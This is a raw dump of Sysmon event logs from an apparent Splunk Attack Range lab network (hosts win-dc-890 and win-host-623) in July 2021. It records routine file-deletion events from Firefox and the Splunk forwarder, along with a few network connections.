Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=96B4F53C4C9F615C5D4153D35FB36414,SHA256=AB6CCB0E2A42CD6BAEEA19066EB5A9029D6AB12F9D89DD05D87E94A6AF1D0D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DD4664689C9B8784618AC931A5C64968,SHA256=A20888C0BBF4092ED7EF4D0786238F23B0C21CD56E36B94E34836783EC5BA4CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.428{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C92BF41A14C37C653AB7C94647684270,SHA256=3918015DEE822B3045C7BBDE285832F1460C5447B2AB2C706B61DB072AB06B1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.426{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4BAC7CD32CA4FC89F297FE23F430409E,SHA256=DF42033A16CF5408D0C0B2A2F05312F85C1748FEDF3A523B4561602D263B4B7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.424{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=27F657DA062B5B14C9734B9FFA162190,SHA256=4B130D62014F5F3B5F29C564F49475A328E38C2BD8B3C0158E971EBCD51ABA8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.261{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63D18582A62017032F6150D6A34D69F1,SHA256=96F286CB08C40349092774482DA5129EF671B77A766A08D18D5A9250B54404C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:33.373{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47F2A1397BA2268032DD6A0BF34C0F3C,SHA256=815CF4C05237A50D97E7690FF0F5B3409B5FA800C99198F4EBA4AE2D71486B7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:24.668{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62010-false10.0.1.12-8000- 23542300x8000000000000000810914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:34.389{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF11A2079378D15EE20048A82EEDDCC9,SHA256=F5DD38074437ED85C161E7C714342DA463C584D10238C02AB24CDD2C7AD7F1F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:34.275{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A29E6FB61936666F348817F599FCF5F,SHA256=B46EB2169ACF13B7C2F6F8CBCE79ED062D4E5E22DF39D682C2B98002058F0AB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:35.391{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D28C931FC44C71BE3CDCC46B0E2D6734,SHA256=9A25ACE12FD66F77558E3261C3FFFC450CDB4F2311574E7029B00A759F4F3FCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:35.277{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=978FDE67FFE60E28F14034C28239160C,SHA256=F17BDD9347B6E22155D0BA79E4A3197766422F821938B644E5A7927BA1F66126,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:36.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAA4780D14D782168BBC6A6BEFBE3687,SHA256=63789B0996E0FCBD47A74EFD0DEF131217982594C29B28C4E3867D6BF33A08E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:36.279{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED84E4A134E845BF3931740F143CB6D,SHA256=30BA45BD720A2FE7D252864E12C33A4A9EBE4470AC6346B91F2CA2284C287489,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:37.293{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5CCA15C96B8E1C77063C9729200A59E,SHA256=A2D6BDBCF7CE45D42C838BACCA60B933FC9F549823C1F12CE4FDBDCDA9FC6EE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:37.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D10BB8D74C026C22A16BB78142BF7CC,SHA256=637A94336E94FBA44A0660C4D68B941480A629C5DB9D4B19419D4834290E887D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:38.422{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49C0A3A8F8498A76DF3F00EA1068961D,SHA256=D624E813D7D04EFB6E22DF8765100BC5304E40BF715A15A2AFA65272234BB138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.709{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=918EC105DEC121CC828C46AEAB9D3D96,SHA256=E55F12E7BB15081C4DDB161DFA186AE7597C0B3959D033B5AB56F088AB1F3CA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.462{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0757A517886858F0F9ECACE419650AB3,SHA256=0E85582FBEB19F3A2D5046748932ACD4C2A33CCE2ED340A7E78C2288AA2803F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F21AE0F5393771800E57158193C5B5D8,SHA256=8ACC55712EE62A25857FC330CE6A7E090AD4A8579C7DC30A45E42434024F676A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=272C41576B3F48CEA1F0F26E9E00776D,SHA256=56AB52D147C5CB82580FEDCC23C75A702A3E6BFDE5EB067DD6A52B769BE69E66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4E8D8650EF254251EF33A639C2DA8D74,SHA256=F4D6CF66F692968CD5ECF948E69F4BC4F64F55D687ECA15DB9601E4E00CF8E72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=15DD2A14F56CD0C02D6101A89D66DC85,SHA256=66660F642A8C17D6580DB94EC2CEA861F31D4570A719C503122EF7E53DA39392,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2D78145DF5D1C3105FA988FAD9A5DD02,SHA256=7F130FB670D8670B3B2C97EFAE2246DF5AB7F0F619FC251056E270BBBED5FB0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D183525B7DE062B8B4ECABE2B251ED07,SHA256=37C5B2B645059446F4D9A5AE9ABBAFD695062375EE4A8A301F6B538A232CF83A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=62769898C1712F5C9896C4FC83CDF411,SHA256=5D4DB8321C2853CF0883EC1F2A738AF0A5299EC3D9CAA33CD037BEA040E6AF4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E85B5DE881A158AC55DAD31ABD2E1F46,SHA256=BFF243A1CB07C350727B0568CE675156155A2AC19CC6A9CBBD79679DDDD26326,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=84C5F37559E429065E6DB4FFD9437ED2,SHA256=BD0C43286C6903A5C3D94CED1E1B03EEA56EC7EDAE60E00CE1DC724E98B94CA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CF0F965B72875B12A98EAD326D20BBAE,SHA256=C3CED0543B5385FC1FAF2C73F706148B14F362552660D77899FF4906ECEE0ED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.294{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FE0F3E2DA411AE082E77609E9A3B961,SHA256=9F059C833BD509165042B294459A5CD2310E77904E3DCF953F9E8CC59178D240,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:36.227{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57499-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:39.453{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C7297661908C5A1B70BCD338A42C3F5,SHA256=7607D712F9A54E41F1AFC903879310FDA40E8871EB05599BFA8F7C997694626C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:30.570{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62011-false10.0.1.12-8000- 23542300x80000000000000001055612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:39.294{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08148704D63F8F23A3EDC7C13B983897,SHA256=BAA495A9104D60676F0C28D8489D7061AD51CC5AFBC0BE25A00C5987E998E284,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:40.547{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B01C883E430F46B550733700979ECE77,SHA256=0117AC8F48BAD28CFF1BCADC607AA36AC4662D78DF8BF3920A79836C83FC4639,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:40.547{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F95D3A87356F56609D502BA588C74C70,SHA256=FCD73BF612EF7636A1187400260D8765AAF72B18FFE4559FB0077AEAB72DFEF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:40.453{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50B28D5A2B1DA5522B35C233A7933EAB,SHA256=A32295109C4AC4AB133BBE24B6EBD984E997533604C4468544F0B8CD6DC9D8E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:40.309{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E12550DB721B9377483652874136B325,SHA256=3A0B216DFD526DCCB31C067099B14C3EAEDA06499E0A77DFEB0837FBD0CC0E06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:41.310{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3457AFDA3069E612607D076AB18347B6,SHA256=3DD8B6482CD4A16C74144AADF3C39FA9CE8D888FD21D91E5263A78762F78FA79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:41.484{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9DCB32C25AD2B57A3595AFB04BD9290,SHA256=E9FCA4ACFA9BE6AF36F0F6DF377E45FE5237CEE7AEB74C9A8D8C0A3D3138422C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:39.427{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-8184-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001055615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.078{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57500-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x8000000000000000810927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:42.500{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EAEC9B290BAE548F3BDCF834F28CBE6,SHA256=4B0165FBAC69773E2FC862FC94E6DC1CC5C1D42E744F145280F5A0848BFF353B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:42.326{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60891DF78F4C7BC7972CF6B7CCA46A02,SHA256=B89581B008272664BF4700F3AE2D10B8596EBC5661EA1E2F6181BB53B2EEDC3E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:39.706{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57500-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:43.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B45B1D29C22F753EE0C7BBB065DE77F,SHA256=A5DF8CE812E909067D4D065F926C9D3DC45E9A2AA5718E94944929D062C2F9AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:43.345{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4071CEC5DABFAE6769262FECB3F39D3,SHA256=6C38A258F4EEC6859F5711BB32E1F0B7E4BB70F41984D2A32FA246EB3C9986E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:35.631{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62012-false10.0.1.12-8000- 23542300x8000000000000000810930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:44.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2281B60A066FE61BBE2FD2196698EA4E,SHA256=82A62886FA0A4742B9962267C5697105EF87222FDBE4D0325501DC41C8BEAE76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:44.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6761C64ABA0D7EB70CC8FD27456D0EEA,SHA256=4D6BA86C5AECD351CB8CF6C4F095C309B2816FF1F461B72BFEC31975ACAB988F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:42.242{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57501-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:45.562{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77402A5C2D544BD8EE176ECE2FC92848,SHA256=82C4D1C0DF65027E4D27B769FAACE75092A67CAD791816612267C2E8499CB3D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:45.375{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86687640DA1764B8EE70EF7390783E0A,SHA256=2894FD9CB151DD80999A2A74DA41E41EE47C221E817BB5A18FD3C6F7C98F4B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:46.390{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C61395D2352665670970642BA19070E5,SHA256=4E32055A929145CC2A8933177BC98994D12B45092335A6349AAC888127D06B17,IMPHASH=00000000000000000000000000000000falsetrue 